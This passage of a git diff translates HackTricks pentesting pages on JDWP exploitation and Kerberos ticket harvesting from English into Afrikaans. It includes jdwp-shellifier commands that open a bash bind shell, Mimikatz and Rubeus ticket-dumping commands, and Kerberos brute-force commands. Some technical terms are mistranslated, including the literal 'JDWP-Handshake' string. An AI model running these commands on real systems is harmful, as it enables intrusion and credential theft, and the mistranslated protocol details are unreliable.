Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Exploiting +## Uitbuiting -JDWP exploitation hinges on the **protocol's lack of authentication and encryption**. It's generally found on **port 8000**, but other ports are possible. The initial connection is made by sending a "JDWP-Handshake" to the target port. If a JDWP service is active, it responds with the same string, confirming its presence. This handshake acts as a fingerprinting method to identify JDWP services on the network. +JDWP-uitbuiting draai om die **gebrek aan outentisering en versleuteling van die protokol**. Dit word gewoonlik op **poort 8000** gevind, maar ander poorte is moontlik. Die aanvanklike verbinding word gemaak deur 'n "JDWP-Handshake" na die teikenpoort te stuur. As 'n JDWP-diens aktief is, reageer dit met dieselfde string om sy teenwoordigheid te bevestig. Hierdie handskommethode dien as 'n vingerafdrukmetode om JDWP-diens op die netwerk te identifiseer. -In terms of process identification, searching for the string "jdwk" in Java processes can indicate an active JDWP session. - -The go-to tool is [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier). You can use it with different parameters: +Wat prosesidentifikasie betref, kan die soektog na die string "jdwk" in Java-prosesse dui op 'n aktiewe JDWP-sessie. +Die go-to-hulpmiddel is [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier). Jy kan dit met verskillende parameters gebruik: ```bash ./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data ./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something ./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept ``` +Ek het gevind dat die gebruik van `--break-on 'java.lang.String.indexOf'` die uitbuiting meer **stabiel** maak. En as jy die kans het om 'n agterdeur na die gasheer te oplaai en dit uit te voer in plaas van 'n bevel uit te voer, sal die uitbuiting selfs meer stabiel wees. -I found that the use of `--break-on 'java.lang.String.indexOf'` make the exploit more **stable**. And if you have the change to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable. +## Meer besonderhede -## More details - -**This is a summary of [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)**. Check it for further details. +**Dit is 'n opsomming van [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)**. Kyk daar vir verdere besonderhede. -1. **JDWP Overview**: - - It's a packet-based network binary protocol, primarily synchronous. - - Lacks authentication and encryption, making it vulnerable when exposed to hostile networks. +1. **JDWP Oorsig**: +- Dit is 'n pakkie-gebaseerde netwerk binêre protokol, hoofsaaklik sinchronies. +- Dit het nie outentisering en enkripsie nie, wat dit kwesbaar maak wanneer dit blootgestel word aan vyandige netwerke. -2. **JDWP Handshake**: - - A simple handshake process is used to initiate communication. A 14-character ASCII string “JDWP-Handshake” is exchanged between the Debugger (client) and the Debuggee (server). +2. **JDWP Handskud**: +- 'n Eenvoudige handskudproses word gebruik om kommunikasie te inisieer. 'n 14-karakter ASCII-string "JDWP-Handskud" word uitgewissel tussen die Debuut (kliënt) en die Debuugee (bediener). -3. **JDWP Communication**: - - Messages have a simple structure with fields like Length, Id, Flag, and CommandSet. - - CommandSet values range from 0x40 to 0x80, representing different actions and events. +3. **JDWP Kommunikasie**: +- Boodskappe het 'n eenvoudige struktuur met velde soos Lengte, Id, Vlag en CommandSet. +- CommandSet-waardes wissel van 0x40 tot 0x80 en verteenwoordig verskillende aksies en gebeure. -4. **Exploitation**: - - JDWP allows loading and invoking arbitrary classes and bytecode, posing security risks. - - The article details an exploitation process in five steps, involving fetching Java Runtime references, setting breakpoints, and invoking methods. +4. **Uitbuiting**: +- JDWP maak dit moontlik om willekeurige klasse en bytekode te laai en aan te roep, wat sekuriteitsrisiko's inhou. +- Die artikel beskryf 'n uitbuitingsproses in vyf stappe, wat die ophaling van Java Runtime-verwysings, die stel van breekpunte en die aanroeping van metodes behels. -5. **Real-Life Exploitation**: - - Despite potential firewall protections, JDWP services are discoverable and exploitable in real-world scenarios, as demonstrated by searches on platforms like ShodanHQ and GitHub. - - The exploit script was tested against various JDK versions and is platform-independent, offering reliable Remote Code Execution (RCE). +5. **Uitbuiting in die werklike lewe**: +- Ten spyte van potensiële firewall-beskerming is JDWP-dienste ontdekbaar en uitbuitbaar in werklike scenario's, soos gedemonstreer deur soektogte op platforms soos ShodanHQ en GitHub. +- Die uitbuitingsskrips is getoets teen verskillende JDK-weergawes en is platform-onafhanklik, en bied betroubare afstandsbeheeruitvoering (RCE). -6. **Security Implications**: - - The presence of open JDWP services on the internet underscores the need for regular security reviews, disabling debug functionalities in production, and proper firewall configurations. +6. **Sekuriteitsimplikasies**: +- Die teenwoordigheid van oop JDWP-dienste op die internet beklemtoon die noodsaaklikheid van gereelde sekuriteitsondersoeke, die deaktivering van foutopsporingsfunksies in produksie en behoorlike firewall-konfigurasies. -### **References:** +### **Verwysings:** * [[https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)] * [https://github.com/IOActive/jdwp-shellifier](https://github.com/IOActive/jdwp-shellifier) @@ -75,14 +73,14 @@ I found that the use of `--break-on 'java.lang.String.indexOf'` make the exploit
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/network-services-pentesting/pentesting-kerberos-88/README.md b/network-services-pentesting/pentesting-kerberos-88/README.md index 3c44604cd..e1090bbc9 100644 --- a/network-services-pentesting/pentesting-kerberos-88/README.md +++ b/network-services-pentesting/pentesting-kerberos-88/README.md @@ -2,36 +2,34 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -**Kerberos** operates on a principle where it authenticates users without directly managing their access to resources. This is an important distinction because it underlines the protocol's role in security frameworks. +**Kerberos** werk op 'n beginsel waar dit gebruikers outentiseer sonder om hul toegang tot hulpbronne direk te bestuur. Dit is 'n belangrike onderskeid omdat dit die rol van die protokol in sekuriteitsraamwerke beklemtoon. -In environments like **Active Directory**, **Kerberos** is instrumental in establishing the identity of users by validating their secret passwords. This process ensures that each user's identity is confirmed before they interact with network resources. However, **Kerberos** does not extend its functionality to evaluate or enforce the permissions a user has over specific resources or services. Instead, it provides a secure way of authenticating users, which is a critical first step in the security process. +In omgewings soos **Active Directory** is **Kerberos** instrumenteel om die identiteit van gebruikers te bevestig deur hul geheime wagwoorde te valideer. Hierdie proses verseker dat elke gebruiker se identiteit bevestig word voordat hulle met netwerkbronne interaksie het. **Kerberos** brei egter nie sy funksionaliteit uit om die regte wat 'n gebruiker oor spesifieke hulpbronne of dienste het te evalueer of af te dwing nie. In plaas daarvan bied dit 'n veilige manier om gebruikers te outentiseer, wat 'n kritieke eerste stap in die sekuriteitsproses is. -After authentication by **Kerberos**, the decision-making process regarding access to resources is delegated to individual services within the network. These services are then responsible for evaluating the authenticated user's rights and permissions, based on the information provided by **Kerberos** about the user's privileges. This design allows for a separation of concerns between authenticating the identity of users and managing their access rights, enabling a more flexible and secure approach to resource management in distributed networks. - -**Default Port:** 88/tcp/udp +Na outentisering deur **Kerberos** word die besluitnemingsproses oor toegang tot hulpbronne gedelegeer na individuele dienste binne die netwerk. Hierdie dienste is dan verantwoordelik vir die evaluering van die regte en toestemmings van die geoutentiseerde gebruiker, gebaseer op die inligting wat **Kerberos** verskaf oor die gebruiker se voorregte. Hierdie ontwerp maak dit moontlik om 'n skeiding van verantwoordelikhede te hê tussen die outentisering van die identiteit van gebruikers en die bestuur van hul toegangsregte, wat 'n meer buigsame en veilige benadering tot hulpbronbestuur in verspreide netwerke moontlik maak. +**Verstekpoort:** 88/tcp/udp ``` PORT STATE SERVICE 88/tcp open kerberos-sec ``` +### **Om te leer hoe om Kerberos te misbruik, moet jy die pos oor** [**Active Directory**](../../windows-hardening/active-directory-methodology/)** lees.** -### **To learn how to abuse Kerberos you should read the post about** [**Active Directory**](../../windows-hardening/active-directory-methodology/)**.** - -## More +## Meer ### Shodan @@ -39,54 +37,52 @@ PORT STATE SERVICE ### MS14-068 -The MS14-068 flaw permits an attacker to tamper with a legitimate user's Kerberos login token to falsely claim elevated privileges, such as being a Domain Admin. This counterfeit claim is mistakenly validated by the Domain Controller, enabling unauthorized access to network resources across the Active Directory forest. +Die MS14-068 fout stel 'n aanvaller in staat om 'n legitieme gebruiker se Kerberos aanmeldings-token te manipuleer om valse verhewe regte te eis, soos om 'n Domein Admin te wees. Hierdie valse eis word per abuis deur die Domeinbeheerder gevalideer, wat ongemagtigde toegang tot netwerkbronne regoor die Active Directory-bos moontlik maak. {% embed url="https://adsecurity.org/?p=541" %} -Other exploits: [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek) - -## HackTricks Automatic Commands +Ander exploits: [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek) +## HackTricks Outomatiese Opdragte ``` Protocol_Name: Kerberos #Protocol Abbreviation if there is one. Port_Number: 88 #Comma separated if there is more than one. Protocol_Description: AD Domain Authentication #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for Kerberos - Note: | - Kerberos operates on a principle where it authenticates users without directly managing their access to resources. This is an important distinction because it underlines the protocol's role in security frameworks. - In environments like **Active Directory**, Kerberos is instrumental in establishing the identity of users by validating their secret passwords. This process ensures that each user's identity is confirmed before they interact with network resources. However, Kerberos does not extend its functionality to evaluate or enforce the permissions a user has over specific resources or services. Instead, it provides a secure way of authenticating users, which is a critical first step in the security process. +Name: Notes +Description: Notes for Kerberos +Note: | +Kerberos operates on a principle where it authenticates users without directly managing their access to resources. This is an important distinction because it underlines the protocol's role in security frameworks. +In environments like **Active Directory**, Kerberos is instrumental in establishing the identity of users by validating their secret passwords. This process ensures that each user's identity is confirmed before they interact with network resources. However, Kerberos does not extend its functionality to evaluate or enforce the permissions a user has over specific resources or services. Instead, it provides a secure way of authenticating users, which is a critical first step in the security process. - https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88 +https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88 Entry_2: - Name: Pre-Creds - Description: Brute Force to get Usernames - Command: nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="{Domain_Name}",userdb={Big_Userlist} {IP} +Name: Pre-Creds +Description: Brute Force to get Usernames +Command: nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="{Domain_Name}",userdb={Big_Userlist} {IP} Entry_3: - Name: With Usernames - Description: Brute Force with Usernames and Passwords - Note: consider git clonehttps://github.com/ropnop/kerbrute.git ./kerbrute -h +Name: With Usernames +Description: Brute Force with Usernames and Passwords +Note: consider git clonehttps://github.com/ropnop/kerbrute.git ./kerbrute -h Entry_4: - Name: With Creds - Description: Attempt to get a list of user service principal names - Command: GetUserSPNs.py -request -dc-ip {IP} active.htb/svc_tgs +Name: With Creds +Description: Attempt to get a list of user service principal names +Command: GetUserSPNs.py -request -dc-ip {IP} active.htb/svc_tgs ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md b/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md index 9fc73f1f0..31727465e 100644 --- a/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md +++ b/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md @@ -1,48 +1,44 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-### Credential Storage in Linux -Linux systems store credentials in three types of caches, namely **Files** (in `/tmp` directory), **Kernel Keyrings** (a special segment in the Linux kernel), and **Process Memory** (for single-process use). The **default\_ccache\_name** variable in `/etc/krb5.conf` reveals the storage type in use, defaulting to `FILE:/tmp/krb5cc_%{uid}` if not specified. +### Kredensiaalopberging in Linux +Linux-stelsels stoor kredensiale in drie tipes kasgeheues, naamlik **Lêers** (in die `/tmp`-gids), **Kernel Keyrings** ( 'n spesiale segment in die Linux-kernel) en **Prosesgeheue** (vir enkelprosesgebruik). Die **default\_ccache\_name** veranderlike in `/etc/krb5.conf` onthul die tipe opberging wat gebruik word, wat standaard na `FILE:/tmp/krb5cc_%{uid}` verwys as dit nie gespesifiseer is nie. -### Extracting Credentials -The 2017 paper, [**Kerberos Credential Thievery (GNU/Linux)**](https://www.delaat.net/rp/2016-2017/p97/report.pdf), outlines methods for extracting credentials from keyrings and processes, emphasizing the Linux kernel's keyring mechanism for managing and storing keys. +### Onttrekking van Kredensiale +Die 2017-artikel, [**Kerberos Credential Thievery (GNU/Linux)**](https://www.delaat.net/rp/2016-2017/p97/report.pdf), beskryf metodes vir die onttrekking van kredensiale uit sleutelringe en prosesse, met die klem op die Linux-kernel se sleutelringmeganisme vir die bestuur en berging van sleutels. -#### Keyring Extraction Overview -The **keyctl system call**, introduced in kernel version 2.6.10, allows user space applications to interact with kernel keyrings. Credentials in keyrings are stored as components (default principal and credentials), distinct from file ccaches which also include a header. The **hercules.sh script** from the paper demonstrates extracting and reconstructing these components into a usable file ccache for credential theft. +#### Oorsig van Sleutelringonttrekking +Die **keyctl-stelseloproep**, wat in kernelweergawe 2.6.10 ingevoer is, maak dit vir toepassings in gebruikersruimte moontlik om met kernel-sleutelringe te kommunikeer. Kredensiale in sleutelringe word as komponente gestoor (verstekprinsipaal en kredensiale), wat verskil van lêer-ccaches wat ook 'n kop bevat. Die **hercules.sh-skripsie** uit die artikel demonstreer die onttrekking en herkonstruksie van hierdie komponente in 'n bruikbare lêer-ccache vir kredensiaaldiefstal. -#### Ticket Extraction Tool: Tickey -Building on the principles of the **hercules.sh script**, the [**tickey**](https://github.com/TarlogicSecurity/tickey) tool is specifically designed for extracting tickets from keyrings, executed via `/tmp/tickey -i`. +#### Hulpmiddel vir Onttrekking van Kaartjies: Tickey +Met die beginsels van die **hercules.sh-skripsie** as basis, is die [**tickey**](https://github.com/TarlogicSecurity/tickey) hulpmiddel spesifiek ontwerp vir die onttrekking van kaartjies uit sleutelringe, uitgevoer deur middel van `/tmp/tickey -i`. -## References +## Verwysings * [**https://www.tarlogic.com/en/blog/how-to-attack-kerberos/**](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md b/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md index d32b986cd..2fc4cfc87 100644 --- a/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md +++ b/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md @@ -1,32 +1,29 @@ -# Harvesting tickets from Windows +# Oes van kaartjies vanaf Windows
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Tickets in Windows are managed and stored by the **lsass** (Local Security Authority Subsystem Service) process, responsible for handling security policies. To extract these tickets, it's necessary to interface with the lsass process. A non-administrative user can only access their own tickets, while an administrator has the privilege to extract all tickets on the system. For such operations, the tools **Mimikatz** and **Rubeus** are widely employed, each offering different commands and functionalities. +Kaartjies in Windows word bestuur en gestoor deur die **lsass** (Local Security Authority Subsystem Service) proses, wat verantwoordelik is vir die hanteer van sekuriteitsbeleide. Om hierdie kaartjies te onttrek, is dit nodig om met die lsass-proses te kommunikeer. 'n Nie-administratiewe gebruiker kan slegs toegang verkry tot hul eie kaartjies, terwyl 'n administrateur die voorreg het om alle kaartjies op die stelsel te onttrek. Vir sulke operasies word die gereedskap **Mimikatz** en **Rubeus** wyd gebruik, elk met verskillende opdragte en funksionaliteite. ### Mimikatz -Mimikatz is a versatile tool that can interact with Windows security. It's used not only for extracting tickets but also for various other security-related operations. - +Mimikatz is 'n veelsydige gereedskap wat kan kommunikeer met Windows-sekuriteit. Dit word nie net gebruik om kaartjies te onttrek nie, maar ook vir verskeie ander sekuriteitsverwante operasies. ```bash # Extracting tickets using Mimikatz sekurlsa::tickets /export ``` - ### Rubeus -Rubeus is a tool specifically tailored for Kerberos interaction and manipulation. It's used for ticket extraction and handling, as well as other Kerberos-related activities. - +Rubeus is 'n instrument wat spesifiek ontwerp is vir Kerberos-interaksie en manipulasie. Dit word gebruik vir die onttrekking en hanteer van kaartjies, sowel as ander Kerberos-verwante aktiwiteite. ```bash # Dumping all tickets using Rubeus .\Rubeus dump @@ -45,22 +42,21 @@ Rubeus is a tool specifically tailored for Kerberos interaction and manipulation # Converting a ticket to hashcat format for offline cracking .\Rubeus.exe hash /ticket: ``` +Wanneer jy hierdie opdragte gebruik, verseker dat jy plaatshouers soos `` en `` vervang met die werklike Base64-geënkripteerde kaartjie en Logon ID onderskeidelik. Hierdie gereedskap bied uitgebreide funksionaliteit vir die bestuur van kaartjies en die interaksie met die sekuriteitsmeganismes van Windows. -When using these commands, ensure to replace placeholders like `` and `` with the actual Base64 encoded ticket and Logon ID respectively. These tools provide extensive functionality for managing tickets and interacting with the security mechanisms of Windows. - -## References +## Verwysings * [https://www.tarlogic.com/en/blog/how-to-attack-kerberos/](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/network-services-pentesting/pentesting-ldap.md b/network-services-pentesting/pentesting-ldap.md index 200c36ea8..1dc5da889 100644 --- a/network-services-pentesting/pentesting-ldap.md +++ b/network-services-pentesting/pentesting-ldap.md @@ -2,36 +2,33 @@
